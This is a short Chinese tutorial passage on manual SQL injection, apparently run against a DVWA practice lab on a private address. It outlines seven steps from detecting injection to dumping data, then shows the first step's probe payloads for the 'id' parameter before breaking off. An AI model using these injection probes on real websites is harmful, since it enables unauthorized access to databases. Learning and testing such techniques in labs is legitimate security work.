SQL注入流程
面对一个查询条件的web网页,我们需要做以下的事情
1.判断是否存在注入,注入是字符型还是数字型
2.猜解SQL查询语句中的字段数
3.确定显示的字段顺序
4.获取当前数据库
5.获取数据库中的表
6.获取表中的字段名
7.下载数据
这里我们用hackbar,方便我们操作。
http://192.168.5.155:85/vulnerabilities/sqli/?id=1&Submit=Submit#
利用hackbar后我们在加黑处进行命令修改,以达到手工注入的目的
1.判断是否存在注入,注入是字符型还是数字型
?id=1
?id=1'
?id=1' and '1'='1
?id=1' and '1'='